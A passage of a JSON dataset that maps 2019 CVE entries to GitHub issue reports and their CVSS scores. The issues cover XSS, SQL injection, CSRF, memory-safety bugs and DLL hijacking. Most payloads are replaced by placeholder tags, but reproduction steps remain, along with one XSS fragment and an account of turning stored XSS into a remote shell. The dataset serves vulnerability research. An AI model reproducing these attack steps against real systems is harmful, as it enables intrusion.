        "Repo_new": "shi-yang/jnoj",
        "Issue_Created_At": "2019-10-06T16:13:29Z",
        "description": "NUMBERTAG APITAG NUMBERTAG ERRORTAG \u53d1\u4e00\u4e2aHTTP\u8bf7\u6c42\u5185\u5bb9\u5982\u4e0b: ERRORTAG \u8bf7\u6c42\u6210\u529f\u540e\u8bbf\u95eeurl APITAG NUMBERTAG ss\u6f0f\u6d1e Payload CODETAG \u67e5\u770b\u95ee\u9898\u6807\u9898\u5217\u8868\u5373\u53ef\u89e6\u53d1. APITAG NUMBERTAG ss\u4ee3\u7801 APITAG Payload ERRORTAG NUMBERTAG ss\u4ee3\u7801. APITAG NUMBERTAG APITAG APITAG PHP\u540e\u7aef\u5904\u7406\u5bf9hint\u53c2\u6570\u7684\u8fc7\u6ee4\u89c4\u5219\u5982\u4e0b APITAG APITAG APITAG APITAG \u6211\u770b\u4e86\u4e0b\u540e\u53f0\u7ba1\u7406\u4e5f\u6709\u51e0\u5904XSS NUMBERTAG HTTP\u8bf7\u6c42\u5982\u4e0b CODETAG \u89e6\u53d1\u9875\u9762 APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17494",
        "Issue_Url_old": "https://github.com/baijunyao/laravel-bjyblog/issues/118",
        "Issue_Url_new": "https://github.com/baijunyao/laravel-bjyblog/issues/118",
        "Repo_new": "baijunyao/laravel-bjyblog",
        "Issue_Created_At": "2019-10-07T13:51:50Z",
        "description": "\u7533\u8bf7\u53cb\u94fe\u5b58\u5728xss\u6f0f\u6d1e. \u5728\u524d\u53f0\u7533\u8bf7\u53cb\u94fe\u7684\u65f6\u5019\u5728url\u5730\u5740\u8f93\u5165 APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG \u6ca1\u6709\u5224\u65ad\u5b57\u7b26\u4e32\u5728http\u7684\u4f4d\u7f6e, APITAG \u90a3\u8fd9\u6837\u5c31\u7ed5\u8fc7\u4e86,\u5e94\u8be5\u5224\u65adhttp\u8981\u5728\u5b57\u7b26\u4e32\u5f00\u59cb\u4f4d\u7f6e\u51fa\u73b0.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17521",
        "Issue_Url_old": "https://github.com/Elias-Black/Landing-CMS/issues/8",
        "Issue_Url_new": "https://github.com/elias-black/landing-cms/issues/8",
        "Repo_new": "elias-black/landing-cms",
        "Issue_Created_At": "2019-09-10T07:45:27Z",
        "description": "Landing CMS has Cross site request forgery.. URLTAG I can change the admin's password when admin click the csrf html file. payload: CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17522",
        "Issue_Url_old": "https://github.com/HotaruCMS/HotaruCMS/issues/101",
        "Issue_Url_new": "https://github.com/hotarucms/hotarucms/issues/101",
        "Repo_new": "hotarucms/hotarucms",
        "Issue_Created_At": "2019-09-26T09:21:57Z",
        "description": "APITAG NUMBERTAG has a Stored Cross Site Scripting in SITE NAME.. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-17528",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/432",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/432",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-09-23T02:21:12Z",
        "description": "SEGV_UNKNOW was discovered in APITAG in APITAG . bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG SEGV_UNKNOW description An issue was discovered in bento NUMBERTAG There is a/an SEGV_UNKNOW in function APITAG at APITAG NUMBERTAG commandline mp4edit APITAG a.mp4 source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp4edit NUMBERTAG crash name pwd bento4 mp4edit NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17529",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/430",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/430",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-09-23T02:16:44Z",
        "description": "A heap buffer overflow was discovered in APITAG in APITAG bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4dump verbosity NUMBERTAG APITAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4dump NUMBERTAG crash name pwd bento4 mp4dump NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-17530",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/431",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/431",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-09-23T02:19:02Z",
        "description": "A heap buffer overflow was discoverad in APITAG at APITAG NUMBERTAG bento4 version bento NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4dump verbosity NUMBERTAG APITAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4dump NUMBERTAG crash name pwd bento4 mp4dump NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-17531",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2498",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2498",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-10-12T17:42:27Z",
        "description": "Block one more gadget type (apache log4j extras NUMBERTAG CVE to be allocated). Another gadget type reported regarding a class of apache log4j extras package. Mitre id: to be allocated Reporter: \u5f20\u5148\u8f89 Zhangxianhui Fix will be included in NUMBERTAG backported in NUMBERTAG branch too. Not consider vuln for NUMBERTAG or later.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17537",
        "Issue_Url_old": "https://github.com/shi-yang/jnoj/issues/53",
        "Issue_Url_new": "https://github.com/shi-yang/jnoj/issues/53",
        "Repo_new": "shi-yang/jnoj",
        "Issue_Created_At": "2019-10-10T06:43:47Z",
        "description": "NUMBERTAG PATHTAG NUMBERTAG ERRORTAG APITAG FILETAG APITAG NUMBERTAG PATHTAG NUMBERTAG ERRORTAG \u8bf7\u6c42url URLTAG APITAG \u4fee\u590d\u5efa\u8bae:\u5bf9\u4f20\u5165\u7684\u6587\u4ef6\u540d\u79f0\u505a\u6821\u9a8c.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17541",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1641",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1641",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-07-18T09:43:55Z",
        "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG f9e NUMBERTAG aab NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG c3d9a6 in APITAG APITAG NUMBERTAG d1 in APITAG APITAG NUMBERTAG b2 in main APITAG NUMBERTAG f9e NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG af NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f9e NUMBERTAG ed NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f9e NUMBERTAG cfac in APITAG APITAG NUMBERTAG f9e NUMBERTAG e in APITAG APITAG NUMBERTAG f9e NUMBERTAG b NUMBERTAG c in APITAG APITAG NUMBERTAG f9e NUMBERTAG PATHTAG ) previously allocated by thread T0 here NUMBERTAG f9e NUMBERTAG ed NUMBERTAG in malloc ( PATHTAG NUMBERTAG f9e NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG fb NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f9e NUMBERTAG ff NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG d in APITAG APITAG NUMBERTAG f9e NUMBERTAG b7ec in APITAG APITAG NUMBERTAG f9e NUMBERTAG PATHTAG ) SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17543",
        "Issue_Url_old": "https://github.com/lz4/lz4/issues/801",
        "Issue_Url_new": "https://github.com/lz4/lz4/issues/801",
        "Repo_new": "lz4/lz4",
        "Issue_Created_At": "2019-10-16T08:43:07Z",
        "description": "Question concerning CVETAG . Hi, I am looking into CVETAG NUMBERTAG specifically I am trying to verify if the issue is present since NUMBERTAG as stated in the comment NUMBERTAG I am testing lz4 version NUMBERTAG and tried to reproduce the issue using an asan build. The command used to reproduce was 'lz NUMBERTAG l APITAG outfile'. Verified that libasan.so was used by lz4 and APITAG verified that the correct liblz4 library is used and that the reproduce is the correct. But still do not see a problem with the old APITAG It would be great if someone could provide some feedback concerning the statement, that the problem is present since NUMBERTAG Please note that I used a patch for lz4 which forces the lz4 binary to use the shared library instead of inlining all the LZ4_ functions. But I think that should not cause any problems NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-17552",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/77",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/77",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-09-02T20:36:10Z",
        "description": "There is a SQL injection in FILETAG of iCMS. The cause of the vulnerability is similar to issus NUMBERTAG URLTAG FILETAG But the payload need a Two dimensional array, which is different from the previous one. CODETAG Step NUMBERTAG save the payload output in an txt file NUMBERTAG import the file as scheme NUMBERTAG see the different from the return time Pics: sleep NUMBERTAG FILETAG sleep NUMBERTAG FILETAG sleep NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17553",
        "Issue_Url_old": "https://github.com/sari3l/cve-test/issues/1",
        "Issue_Url_new": "https://github.com/sari3l/cve-test/issues/1",
        "Repo_new": "sari3l/cve-test",
        "Issue_Created_At": "2019-10-14T10:55:18Z",
        "description": "APITAG beta NUMBERTAG ulnerability Name: Metinfo CMS Background SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG web can see the web application uses gpc to filter variables in the form. code in APITAG FILETAG but the developers use the get_sql function for secondary filtering, causing escape single quotes. FILETAG payload FILETAG attack with sqlmap ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17580",
        "Issue_Url_old": "https://github.com/Tooonyy/dormsystem/issues/1",
        "Issue_Url_new": "https://github.com/tooonyy/dormsystem/issues/1",
        "Repo_new": "tooonyy/dormsystem",
        "Issue_Created_At": "2019-10-14T12:28:18Z",
        "description": "SQL Injection Vulnerability in FILETAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17581",
        "Issue_Url_old": "https://github.com/Tooonyy/dormsystem/issues/2",
        "Issue_Url_new": "https://github.com/tooonyy/dormsystem/issues/2",
        "Repo_new": "tooonyy/dormsystem",
        "Issue_Created_At": "2019-10-14T12:37:15Z",
        "description": "XSS vulnerability in FILETAG / payload= /> APITAG alert NUMBERTAG APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17582",
        "Issue_Url_old": "https://github.com/nih-at/libzip/issues/5",
        "Issue_Url_new": "https://github.com/nih-at/libzip/issues/5",
        "Repo_new": "nih-at/libzip",
        "Issue_Created_At": "2017-08-24T10:44:17Z",
        "description": "use after free in _zip_buffer_free (zip_buffer.c). On NUMBERTAG ERRORTAG Testcase: URLTAG I don't know if it is related to the bug fixed here URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17583",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/83",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/83",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-10-12T08:07:49Z",
        "description": "DOS attack. DOS attack exists in view comment module FILETAG Your review comment feature allows you to query up to NUMBERTAG billion comments. FILETAG Attackers will cause your database to jam or crash through such an attack FILETAG Moreover, the query does not limit CSRF attacks, which can cause database crashes by constructing malicious links",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17593",
        "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/1",
        "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/1",
        "Repo_new": "Cherry-toto/jizhicms",
        "Issue_Created_At": "2019-09-25T04:41:38Z",
        "description": "\u6dfb\u52a0\u7ba1\u7406\u5458\u5904\u5b58\u5728csrf\u6f0f\u6d1e. \u60a8\u597d\uff0c APITAG site request forgery\uff0c\u7b80\u79f0CSRF\uff09\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG APITAG > poc\u5982\u4e0b\uff1a CODETAG \u6709\u95ee\u9898\u7684\u8bdd\u60a8\u53ef\u4ee5\u7ee7\u7eed\u548c\u6211\u8054\u7cfb",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17596",
        "Issue_Url_old": "https://github.com/golang/go/issues/34960",
        "Issue_Url_new": "https://github.com/golang/go/issues/34960",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2019-10-17T18:43:01Z",
        "description": "crypto/dsa: invalid public key causes panic in APITAG Invalid DSA public keys can cause a panic in APITAG In particular, using APITAG on a crafted NUMBERTAG certificate chain can lead to a panic, even if the certificates don\u2019t chain to a trusted root. The chain can be delivered via a crypto/tls connection to a client, or to a server that accepts and verifies client certificates. net/http clients can be made to crash by an HTTPS server, while net/http servers that accept client certificates will recover the panic and are unaffected. Moreover, an application might crash invoking crypto NUMBERTAG APITAG APITAG on an NUMBERTAG certificate request, parsing a PATHTAG Entity, or during a PATHTAG conversation. Finally, a PATHTAG client can panic due to a malformed host key, while a server could panic if either APITAG accepts a malformed public key, or if APITAG accepts a certificate with a malformed public key. The issue is CVETAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17599",
        "Issue_Url_old": "https://github.com/QuizandSurveyMaster/quiz_master_next/issues/795",
        "Issue_Url_new": "https://github.com/quizandsurveymaster/quiz_master_next/issues/795",
        "Repo_new": "quizandsurveymaster/quiz_master_next",
        "Issue_Created_At": "2019-11-13T07:45:25Z",
        "description": "report reflected xss vulnerability. IF YOU DO NOT FOLLOW THIS TEMPLATE, YOUR ISSUE MAY BE CLOSED!! Please provide the following information when creating your issues: Site Info APITAG Version: Latest QSM Version NUMBERTAG and NUMBERTAG Browser: chrome NUMBERTAG General description Quiz And Survey Master \u2013 Best Quiz Plugin for APITAG for APITAG is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and APITAG code via the from or till parameter. The component is: PATHTAG The attack vector is: When the Administrator is logged in, a reflected XSS may execute upon a click on a malicious URL. \u200b special conditions must be met in order to exploit this vulnerability: The wordpress security feature APITAG which is enabled by default, has to be disabled. \u200b Vulnerable code : PATHTAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Link to quiz or screenshot (if relevant): Expected behavior nothing. Actual behavior reflected XSS, victim may click the malicious url. APITAG must be logged in.) Steps to reproduce the behavior URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17625",
        "Issue_Url_old": "https://github.com/ramboxapp/community-edition/issues/2418",
        "Issue_Url_new": "https://github.com/ramboxapp/community-edition/issues/2418",
        "Repo_new": "ramboxapp/community-edition",
        "Issue_Created_At": "2019-10-16T02:51:46Z",
        "description": "Stored XSS vulnerability in Rambo NUMBERTAG Issue Hey! How you doing this PATHTAG I'm doing pretty good, thanks for asking, unfortuantley I have some bad news for you ... There is a stored XSS in Rambox version NUMBERTAG that is capable of leading to RCE. The XSS is in the name field while adding/editing a service. The problem occurs due to incorrect sanitization of the name field when being processed and stored. This allows a user to craft a specific payload that will produce up to (but not limited to) RCE. How (come I even tried this ;p)? The vulnerability occurs, as mentioned above, in the name field due to unsantized input. A end user is able to input anything they want into the field which will be displayed. Due to this APITAG tags and APITAG tags are also allowed. For example if we take the payload ERRORTAG and add it as the name of one of our services we will be met with the following: FILETAG As you can clearly see the tag is processed and executed within the application. If we restart Rambox, we will be met with the same message. (I was really bored at work, and since we use this I was like why the heck not right? Turns out now I have a really big vulnerability to deal with tomorrow ... YAY ME!) Impact Seeing as this repository has NUMBERTAG k stars, I'd assume the impact to be pretty significant. I'm planning on writing some exploit code for it, and will happily share that with you and the rest of the world once it's done. But you said RCE? Oh heck yes I did! Let's get RCE from a stored XSS vulnerability really quick! So as determined above, we can use anything for the name field. So what about a shell? Can w do that? I mean I don't see why not so lets find out ... Payload: ERRORTAG Since the application uses node (as stated in the about section and because it's electron) we can safely assume that we can also use node. Now all we have to do is restart the box and setup a listener. Lets try it out: FILETAG And that my friends, is how you get RCE from XSS. I'll be here all week.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-17662",
        "Issue_Url_old": "https://github.com/bewest/thinvnc/issues/5",
        "Issue_Url_new": "https://github.com/bewest/thinvnc/issues/5",
        "Repo_new": "bewest/thinvnc",
        "Issue_Created_At": "2019-10-16T08:15:49Z",
        "description": "Authentication Bypass and Arbitrary file read can compromise this VNC server. An authenticated attacker can compromise the VNC server even password protected. There's a bug in the web client which is vulnerable to directory traversal. Accessing the credentials could compromise the whole VNC server and gives an attacker the terminal access to the remote system.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17664",
        "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/107",
        "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/107",
        "Repo_new": "nationalsecurityagency/ghidra",
        "Issue_Created_At": "2019-03-07T23:07:52Z",
        "description": "Uncontrolled Search Path Element when executing CMD.. Describe the bug When executing Ghidra from a given path the Java process working directory is set to this path. Then, when launching Python interpreter located in APITAG Codebrowser\" > APITAG > APITAG Ghidra will try to execute an arbitrary file APITAG located at the attacker choosen working directory. To Reproduce Steps to reproduce the behavior NUMBERTAG Copy an arbitrary Portable Executable file named APITAG into a folder, for instance: PATHTAG NUMBERTAG Open a command line and go to the choosen folder. Following the same example: cd PATHTAG NUMBERTAG Execute Ghidra from the command line: FILETAG Environment (please complete the following information): OS: Microsoft Windows NUMBERTAG ersion NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-17665",
        "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/286",
        "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/286",
        "Repo_new": "nationalsecurityagency/ghidra",
        "Issue_Created_At": "2019-03-28T21:41:39Z",
        "description": "DLL Hijacking \"\". Describe the bug Ghidra NUMBERTAG is vulnerable to DLL hijacking because it loads, at least, APITAG from the working directory instead of loading it from the right directory where it is expected to be. To Reproduce Steps to reproduce the behavior NUMBERTAG Compile the following code and name the resulting binary file as APITAG CODETAG NUMBERTAG Execute Ghidra from the working directory where the resulting APITAG do exist NUMBERTAG APITAG file will get executed. Expected behavior Load APITAG from the rigth directory where it is expected to be. Screenshots FILETAG Environment (please complete the following information): OS: Microsoft Windows NUMBERTAG APITAG Java Version NUMBERTAG Ghidra Version NUMBERTAG Additional context In practice, vulnerability can be exploited, for instance, if the user launches Ghidra Projects from the contextual menu and it comes with a malicious APITAG file. CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-17676",
        "Issue_Url_old": "https://github.com/anx1ang/notes/issues/1",
        "Issue_Url_new": "https://github.com/newkin1996/notes/issues/1",
        "Repo_new": "newkin1996/notes",
        "Issue_Created_At": "2019-10-09T06:58:49Z",
        "description": "APITAG NUMBERTAG beta allows a CSRF attack to add a user account via a APITAG action to FILETAG , as demonstrated by an APITAG URI.. code: at PATHTAG source code: ERRORTAG Global search code about csrf. APITAG No code found to defend against CSRF attacks. exp: After the administrator logged in, open the following page ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-18214",
        "Issue_Url_old": "https://github.com/PaulLereverend/NextcloudVideo_Converter/issues/22",
        "Issue_Url_new": "https://github.com/paullereverend/nextcloudvideo_converter/issues/22",
        "Repo_new": "paullereverend/nextcloudvideo_converter",
        "Issue_Created_At": "2019-10-18T11:40:12Z",
